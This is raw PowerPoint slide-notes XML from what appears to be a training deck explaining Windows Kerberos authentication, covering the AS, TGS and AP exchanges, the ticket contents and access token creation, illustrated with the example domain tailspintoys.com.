service (TGS) exchange.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16744075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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos client on the workstation sends the message KRB_AS_REQ to the KDC in tailspintoys.com.</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message includes:</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user principal name.</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name of the account domain.</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Pre-authentication data encrypted with the user's key derived from the user's password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="900"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Retrieving the user key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC gets its copy of the user key from the user's record in its account database. When it receives a request from the Kerberos client on the user's workstation, the KDC searches its database for the user, pulls up the account record, and takes the user key from a field in the record.</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This process—computing one copy of the key from a password, fetching another copy of the key from a database—actually takes place only once, when a user initially logs on to the network. Immediately after accepting the user's password and deriving the user's long-term key, the Kerberos client on the workstation requests a service ticket and TGS session key that it can use in subsequent transactions with the KDC during this logon session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900"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Verifying the user's identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC decrypts the pre-authentication data and evaluates the timestamp inside. If the timestamp passes the test, the KDC can be assured that the pre-authentication data was encrypted with the user key and thus verify that the user is genuine.</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After it has verified the user's identity, the KDC creates credentials that the Kerberos client on the workstation can present to the ticket-granting service. For more information about how domain controllers create credentials in a Windows environment, see "How Access Tokens Work" in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Access Tokens Technical Reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>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23280156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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC replies with KRB_AS_REP containing a service ticket for itself. This special service ticket is called a ticket-granting ticket (TGT). Like an ordinary service ticket, a TGT contains a copy of the session key that the service (in this case the KDC) will use in communicating with the user. The message that returns the TGT to the user also includes a copy of the session key that the user can use in communicating with the KDC. The TGT is encrypted in the KDC's long-term key. The user's copy of the session key is encrypted in the user's long-term key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="900"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KRB_AS_REP Message Contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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message includes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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A TGS session key for the user to use with the TGS, encrypted with the user key derived from the user's password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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A TGT for the KDC in tailspintoys.com, encrypted with the TGS key.</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TGT includes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="384431" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A TGS session key for the KDC to use with the user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="384431" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Authorization data for the user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="384431" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The authorization data includes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="499520" lvl="2" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The SID for the user's account.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="499520" lvl="2" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SIDs for security groups which the user is a member of in the domain tailspintoys.com.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="499520" lvl="2" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SIDs for universal groups in the enterprise that include either the user or one of the domain groups the user is a member of.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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When the client receives the KDC's reply to its initial request, the client uses its cached copy of the user key to decrypt its copy of the session key. It can then discard the user key derived from the user's password, for it is no longer needed. In all subsequent exchanges with the KDC, the client uses the TGS session key. Like any other session key, this key is temporary, valid only until the TGT expires or the user logs off. For that reason, the TGS session key is often called a logon session key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="14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From the client's point of view, a TGT is just another ticket. Before the client attempts to connect to any service, the client first checks the user credentials cache for a service ticket to that service. If it does not have one, it checks the cache again for a TGT. If it finds a TGT, the LSA fetches the corresponding logon session key from the cache, uses this key to prepare an authenticator, and sends both the authenticator and the TGT to the KDC, along with a request for a service ticket for the service. In other words, gaining admission to the KDC is no different from gaining admission to any other service in the domain—it requires a session key, an authenticator, and a ticket (in this case, a TGT).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="14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From the KDC's point of view, TGTs enable the KDC to avoid the performance penalties of looking up a user's long term key every time the user requests a service. The KDC looks up the user key only once, when it grants an initial TGT. For all other exchanges with this user, the KDC can decrypt the TGT with its own long-term key, extract the logon session key, and use that to validate the user's authenticator.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe"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22823388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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos client sends the message KRB_TGS_REQ to the KDC in tailspintoys.com.</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message includes:</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name of the target computer.</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name of the target computer's domain.</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user's TGT.</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An authenticator encrypted with the session key the user shares with the KDC.</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17359406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effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC responds to the user's request to connect to a server by sending both copies of the session key to the user. The user's copy of the session key is encrypted with the key that the KDC shares with the user. The workstation's copy of the session key is embedded, along with information about the user, in a data structure called a service ticket. The entire structure is then encrypted with the key that the KDC shares with the user. The ticket—with the user's copy of the session key safely inside—becomes the workstation's responsibility to manage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KRB_TGS_REP message includes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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A session key for the user to share with the computer encrypted with the session key the user shares with the KDC.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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user's service ticket to the computer, encrypted with the computer's secret key. </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service ticket includes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="384431" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A session key for the computer to share with the user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="384431" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Authorization data copied from the user's TGT.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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When the Kerberos client receives the KDC's reply, it extracts the ticket and the user's copy of the session key, putting both in the user credentials cache (located in volatile memory, not on disk).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC is simply providing a ticket-granting service. It does not keep track of its messages to make sure they reach the intended address. No harm will be done if the KDC's messages fall into the wrong hands. Only someone who knows the user's secret key can decrypt the user's copy of the session key. Only someone who knows the client's secret key can read what is inside the ticket.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4994830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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>After credentials reach the workstation, the Windows Server 2003 access token creation process is the same as that of Windows NT versions. The LSA on the workstation receives the user's service ticket, decrypts the service ticket with the system key stored in its credentials cache, and then extracts the authorization data. The privilege attribute certificate (PAC) is taken from the service ticket and used to create the user's access token. The LSA then queries the local SAM database to discover whether the user is a member of any security groups local to the computer, and whether memberships in those groups grant the user any special rights on the local computer. It adds any SIDs returned by this query to the list taken from the ticket's authorization data. The entire list is then used to build an access token, and a handle to the access token is returned to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, along with an identifier for the user's logon session and confirmation that the logon information was valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> creates a window station and several desktop objects for the user, attaches the user's access token, and starts the shell process the user will use to interact with the computer. The user's access token is subsequently inherited by any application process that the user starts during the logon session.</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When the user logs off, the credentials cache is flushed and all service tickets—as well as all session keys—are destroyed.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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42146551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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35288588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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14266055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Pre-authentication isn’t needed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> since the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>kdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>-user session key is encrypted with the user master key, so only the REAL user can use it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>But it helps preventing brute-force and DOS attacks.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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41260368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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55101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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33228200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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11353486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29087268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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The process used to access resources and services on another system works basically the same as the logon example above except that the service ticket will need to be sent to the remote system. Except for the Kerberos authentication, security access checks are nearly identical with those of Windows NT 4.0 and earlier versions.</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In the following example, both the user and service are in tailspintoys.com, the user has already logged on, and the user has requested and received a ticket for the workstation. The client wants to access \\server\shared folder to read a file. The process follows this sequence:</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Client and server negotiate a security package to use for authentication. They choose Kerberos.</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client sends the service ticket (containing user credentials in the PAC) to the server.</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If the server accepts the ticket (that is, is able to decrypt the ticket with its secret key), then the server creates an access token for the user based on the PAC.</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client redirector sends a server message block (SMB) message requesting file access.</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Server security compares file permissions with the user's credentials and grants or denies access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="900"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After Workstation Logon</a:t>
            </a:r>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When the user attempts to use the service on the remote server, the user has already logged on to the local workstation. Thus, the user's credentials cache will have a TGT and a session key for the domain the user's account resides in. This TGT is used to request a ticket for the service. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16744075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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Because the TGT will expire within a few hours, the Kerberos client must check the expiration time before requesting additional tickets. If the TGT is expired, then the Kerberos client must send a KRB_AS_REQ to get another TGT.</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Kerberos client on the user's workstation requests credentials for the service by sending the KDC a Kerberos ticket-granting service request (KRB_TGS_REQ). This message includes the user's name, an authenticator encrypted with the user's logon session key, the TGT obtained in the AS exchange from workstation logon, and the name of the service for which the user wants a ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KRB_TGS_REQ message will typically be sent to the same domain controller that issued the TGT. However, TGS requests can be made to any domain controller. Thus, if the original KDC becomes unavailable, the client can discover a new KDC through a DNS query and then send a KRB_TGS_REQ there.</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When the KDC receives KRB_TGS_REQ, it decrypts the TGT with its own secret key, extracting the user's TGS session key (logon session key). It uses the session key to decrypt the authenticator and evaluates that. If the authenticator passes the test, the KDC extracts the user's authorization data from the TGT and creates another session key for the client to use with the service. The KDC encrypts one copy of this new session key with the user's TGS session key. It embeds another copy of the session key in a ticket, along with the user's authorization data, and encrypts the ticket with the service's key. The KDC then sends these credentials back to the client in a Kerberos ticket-granting service reply (KRB_TGS_REP).</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29294625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effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>When the Kerberos client receives the reply, it uses the user's TGS session key to decrypt the session key to use with the service, and stores the key in its credentials cache. Then it extracts the ticket to the service and stores that in its cache.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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7403086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effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos client on the user's workstation requests service from the service by sending the service a Kerberos application request (KRB_AP_REQ).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="333"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="de-DE"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This message contains:</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An application option flag indicating whether to use session key. (The setting of this flag is one of the options in configuring Kerberos applications. The user is never asked.)</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An application option flag indicating whether the client wants mutual authentication.</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service ticket obtained in the TGS exchange.</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An authenticator encrypted with the session key for the service.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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10454368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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The service receives KRB_AP_REQ, decrypts the ticket, and extracts the user's authorization data and the session key. The service uses the session key to decrypt the user's authenticator and then evaluates the timestamp inside. If the authenticator passes the test, the service looks for a mutual authentication flag in the client's request. If the flag is set, the service uses the session key to encrypt the time from the user's authenticator and returns the result in a Kerberos application reply (KRB_AP_REP). If the flag is not set, then no response is needed.</a:t>
            </a:r>
          </a:p>
          <a:p>
